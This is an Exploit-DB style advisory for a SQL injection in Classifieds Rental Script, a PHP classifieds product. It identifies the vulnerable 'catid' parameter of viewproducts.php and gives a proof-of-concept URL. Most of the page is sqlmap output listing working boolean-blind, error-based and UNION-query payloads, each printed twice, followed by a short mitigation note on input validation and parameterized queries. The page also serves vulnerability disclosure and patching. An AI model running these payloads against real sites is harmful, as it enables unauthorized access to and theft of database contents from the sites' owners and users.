SQL Injection in Classifieds Rental Script

vendor:

Classifieds Rental Script

by:

Arbin Godar

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Classifieds Rental Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

SQL Injection in Classifieds Rental Script

An attacker can exploit a SQL injection vulnerability in Classifieds Rental Script by sending malicious payloads to the vulnerable parameter 'catid' in the 'viewproducts.php' script. The payloads can be sent using tools such as Sqlmap. The payloads can be of type boolean-based blind, error-based, or UNION query. For example, a boolean-based blind payload can be 'catid=-1285' OR 8060=8060#' and an error-based payload can be 'catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#' and a UNION query payload can be 'catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: SQL Injection in Classifieds Rental Script
# Date: 19 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: www.i-netsolution.com

*----------------------------------------------------------------------------------------------------------------------*

# Proof of Concept SQL Injection/Exploit : 
http://localhost/[PATH]/viewproducts.php?catid=PoC%27

# Exploit (using Sqlmap)
---
Parameter: catid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: catid=-1285' OR 8060=8060#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#
---